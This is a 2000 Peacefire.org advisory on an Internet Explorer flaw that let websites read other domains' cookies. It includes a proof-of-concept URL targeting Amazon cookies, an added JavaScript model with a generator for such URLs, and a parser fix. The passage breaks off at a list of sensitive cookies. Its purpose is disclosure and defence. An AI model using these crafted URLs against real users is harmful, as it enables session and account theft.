Peacefire.org - Youth against Internet censorship - "It's not a crime to be smarter than your parents."
Bennett Haselton, bennett@peacefire.org
Jamie McCarthy, jamie@mccarthy.org
5/11/2000
News sightings: Wall Street Journal | NYTimes | CNNfn | Slashdot | CNet | Internet News Radio | Newsbytes | MSNBC | ComputerWorld | National Post | WebDeveloper.com
See also:
JavaScript-in-cookies security hole (4/19/00): C-Net | ZDNet | NTSecurity | MSNBC
Eudora "stealth attachment" demo page (4/27/00): C-Net | ZDNet | Newsbytes | The Register
Internet Explorer "local JavaScript" security hole (5/5/00): C-Net | NewsBytes
"Fake mail form" security hole for Web-based email sites (5/9/00): C-Net | CNN.com
HotMail attachment security hole (5/10/00): Wired | ZDNet | Slashdot | MSNBC | CNN.com
Any Web site that uses cookies to authenticate users or store private information -- including Amazon.com, HotMail, Yahoo Mail, DoubleClick, MP3.com, NYTimes.com, and thousands of others -- could have cookies exposed by Internet Explorer and intercepted by a third-party Web site.
Update 5/18/2000: Microsoft has released a patch that will fix this
vulnerability in Internet Explorer:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
If you have Internet Explorer for Windows, type a domain (e.g. "yahoo.com" or "hotmail.msn.com") into the demonstration form and click the button to view a page on Peacefire.org that displays your cookie for that domain. (You must click the button to submit the domain name; pressing Enter will not work.)
Pascal Gaudette reported that the same scheme also works for HTTPS cookies, as long as the malformed URL uses "https://" and the server it points at (the attacker's server) is HTTPS-enabled, since cookies marked secure are only sent over HTTPS. The second form on the page reads HTTPS cookies the same way (enter a domain name and click the button).
How it works
Using a specially constructed URL, a Web site can read Internet Explorer cookies set by any domain. For example, to read a user's Amazon.com cookie, a site could direct the user's browser to:
http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com/
If you replace each "%2f" with a "/" character and the "%3F" with "?", this URL is really:
http://www.peacefire.org/security/iecookies/showcookie.html?.amazon.com
which is an ordinary page on peacefire.org. IE decodes those escapes when it makes the request, so it fetches showcookie.html from www.peacefire.org. When it decides which cookies that page may see, however, it takes the literal text before the final "/" as the host name, and that text ends in ".amazon.com". IE therefore gets confused and thinks the page is located in the Amazon.com domain, so it allows the page to read the user's Amazon.com cookie.
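The following is an added example, not Peacefire's code and not a reproduction of IE's internals: it models the two ways of reading the host out of the malformed URL described above (one that decodes the "%2f"/"%3F" escapes before splitting, one that does not), the cookie domain matching that makes the mismatch exploitable, and a "split first, then validate" host parser that rejects such URLs. The function names, the craftUrl generalization (which also covers the https case mentioned above), and the hostname check are this example's own assumptions.

```javascript
// Added example (not Peacefire's code): a model of the parser disagreement
// the page describes. Function names and the "split-first" fix are assumed
// for illustration; real IE internals are not reproduced.

// The page's proof-of-concept URL ("%2f" stands for "/", "%3F" for "?").
const POC_URL =
  "http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com/";

// Build such a URL for any attacker page and victim cookie domain. The same
// construction works with "https" when the attacker's server speaks HTTPS.
function craftUrl(scheme, attackerHost, attackerPath, victimDomain) {
  const hidden = (attackerPath + "?").replace(/\//g, "%2f").replace(/\?/g, "%3F");
  return scheme + "://" + attackerHost + hidden + victimDomain + "/";
}

// Everything after "scheme://".
function afterScheme(url) {
  const m = /^https?:\/\/(.*)$/i.exec(url);
  if (!m) throw new Error("only http/https URLs are modelled: " + url);
  return m[1];
}

// Request side: decode the escapes, then cut at the first "/" or "?".
// This is why the page is actually fetched from www.peacefire.org.
function hostForRequest(url) {
  const decoded = afterScheme(url).replace(/%2f/gi, "/").replace(/%3f/gi, "?");
  return decoded.split(/[\/?]/)[0].toLowerCase();
}

// Cookie side: cut at the first literal "/" or "?" without decoding, so the
// escapes stay inside the "host" and the string ends in ".amazon.com".
function hostForCookies(url) {
  return afterScheme(url).split(/[\/?]/)[0].toLowerCase();
}

// Domain matching of the era (RFC 2109 style): a cookie set for ".amazon.com"
// is visible to any host whose name ends with ".amazon.com".
function domainMatches(host, cookieDomain) {
  const h = host.toLowerCase();
  const d = cookieDomain.toLowerCase().replace(/^\.?/, ".");
  return h === d.slice(1) || h.endsWith(d);
}

// The bug in one predicate: the cookie side believes the page is in the
// victim domain while the request side fetched it from somewhere else.
function cookieLeak(url, cookieDomain) {
  const requestHost = hostForRequest(url);
  const cookieHost = hostForCookies(url);
  const leaks =
    domainMatches(cookieHost, cookieDomain) && !domainMatches(requestHost, cookieDomain);
  return { requestHost, cookieHost, leaks };
}

// Fix: one canonical host for both subsystems. Split on literal delimiters
// first, never decode escapes inside the authority, and reject any "host"
// that is not a plain DNS name. Returns null for the PoC URL.
function canonicalHost(url) {
  const host = afterScheme(url).split(/[\/?#]/)[0].toLowerCase();
  return /^[a-z0-9-]+(\.[a-z0-9-]+)*$/.test(host) ? host : null;
}

// Usage when run as a script: show the leak for the page's example URL.
console.log(cookieLeak(POC_URL, ".amazon.com")); // leaks: true
console.log(canonicalHost(POC_URL)); // null: rejected by the split-first parser
```

The design point is that percent-decoding must never happen before the authority is separated from the path: once both the request code and the cookie code agree on one validated host name, a URL whose "host" contains "%2f" or "%3F" is simply rejected instead of being interpreted two different ways.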
Affected:
Internet Explorer (all known versions) for Windows 95,
98, NT, and 2000. IE for the Macintosh does not appear to be affected. Users
have reported that IE versions for Solaris and HP/UX are vulnerable, but
IE's browser share on UNIX platforms is much lower. No version of Netscape
Navigator or any browser other than Internet Explorer appears to be vulnerable.
Workaround:
As of 5/18/2000, Microsoft has released a patch that fixes this problem:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
If you do not want to install the patch, the safest workaround is to disable cookies, so that there is nothing for a malicious page to read. To do this, go to Tools -> Internet Options -> Security, click the button to customize security settings, and set cookies to "Disable". (Note that this will break some sites, such as HotMail, that require cookies.) If you have Netscape's browser installed, it is not affected by the bug and can be used instead.
Implications
Jamie McCarthy came up with a list of cookies set
by various sites that could be used to retrieve sensitive information: